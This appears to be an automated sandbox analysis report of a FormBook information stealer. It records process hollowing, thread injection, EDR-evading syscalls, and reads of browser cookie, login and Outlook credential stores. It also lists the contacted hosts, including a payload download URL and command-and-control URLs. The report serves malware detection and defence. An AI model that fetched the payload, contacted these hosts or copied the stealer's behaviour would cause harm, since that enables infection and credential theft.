Source: KQSYShJeqULXnPcQsI.exe, 0000000B.00000000.2400186511.0000000001891000.00000002.00000001.00040000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000002.2878268632.0000000001890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: KQSYShJeqULXnPcQsI.exe, 0000000B.00000000.2400186511.0000000001891000.00000002.00000001.00040000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000002.2878268632.0000000001890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: KQSYShJeqULXnPcQsI.exe, 0000000B.00000000.2400186511.0000000001891000.00000002.00000001.00040000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000002.2878268632.0000000001890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403373

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 0000000C.00000002.2877363620.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2880110378.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2526300965.0000000022FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2524616734.0000000022980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877853079.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877768736.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2878696007.0000000003000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 0000000C.00000002.2877363620.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2880110378.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2526300965.0000000022FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2524616734.0000000022980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877853079.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877768736.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2878696007.0000000003000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1426621 Sample: 16042024124521.exe Startdate: 16/04/2024 Architecture: WINDOWS Score: 100 51 www.ejbodyart.com 2->51 53 www.jt-berger.store 2->53 55 ejbodyart.com 2->55 79 Multi AV Scanner detection for domain / URL 2->79 81 Malicious sample detected (through community Yara rule) 2->81 83 Antivirus detection for URL or domain 2->83 85 4 other signatures 2->85 11 16042024124521.exe 1 123 2->11         started        signatures3 process4 file5 45 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 11->45 dropped 47 C:\Users\user\AppData\...\Vildnisernes.Tom61, ASCII 11->47 dropped 95 Suspicious powershell command line found 11->95 15 powershell.exe 20 11->15         started        signatures6 process7 file8 49 C:\Users\user\AppData\Local\Temp\Kanels.exe, PE32 15->49 dropped 63 Obfuscated command line found 15->63 65 Writes to foreign memory regions 15->65 67 Sample uses process hollowing technique 15->67 69 2 other signatures 15->69 19 Kanels.exe 2 7 15->19         started        23 conhost.exe 15->23         started        25 cmd.exe 1 15->25         started        signatures9 process10 dnsIp11 57 103.14.155.180, 49739, 80 EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK unknown 19->57 87 Multi AV Scanner detection for dropped file 19->87 89 Maps a DLL or memory area into another process 19->89 27 KQSYShJeqULXnPcQsI.exe 19->27 injected 30 cmd.exe 1 19->30         started        signatures12 process13 signatures14 93 Found direct / indirect Syscall (likely to bypass EDR) 27->93 32 cmd.exe 13 27->32         started        35 conhost.exe 30->35         started        37 reg.exe 1 1 30->37         started        process15 signatures16 71 Tries to steal Mail credentials (via file / registry access) 32->71 73 Tries to harvest and steal browser information (history, passwords, etc) 32->73 75 Modifies the context of a thread in another process (thread injection) 32->75 77 2 other signatures 32->77 39 KQSYShJeqULXnPcQsI.exe 32->39 injected 43 firefox.exe 32->43         started        process17 dnsIp18 59 www.jt-berger.store 217.160.0.183, 49741, 49742, 49743 ONEANDONE-ASBrauerstrasse48DE Germany 39->59 61 ejbodyart.com 112.175.50.218, 49740, 80 KIXS-AS-KRKoreaTelecomKR Korea Republic of 39->61 91 Found direct / indirect Syscall (likely to bypass EDR) 39->91 signatures19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.14.155.180
 unknown unknown
58451 EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK false
217.160.0.183
 www.jt-berger.store Germany
8560 ONEANDONE-ASBrauerstrasse48DE false
112.175.50.218
 ejbodyart.com Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false

Contacted Domains

Name IP Active
ejbodyart.com 112.175.50.218 true
www.jt-berger.store 217.160.0.183 true
www.ejbodyart.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.ejbodyart.com/9pdo/?Nj=1XS0Y&1fd8thFH=DnYaRovP48GzkkJrYMXu2fP+AE8bpUHwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMVyf8d4q8oRy488on7FLg2VDUaCWqziINF2DU= false
    		unknown
    http://www.jt-berger.store/9pdo/ false unknown
    http://103.14.155.180/bwphkvcX154.bin false unknown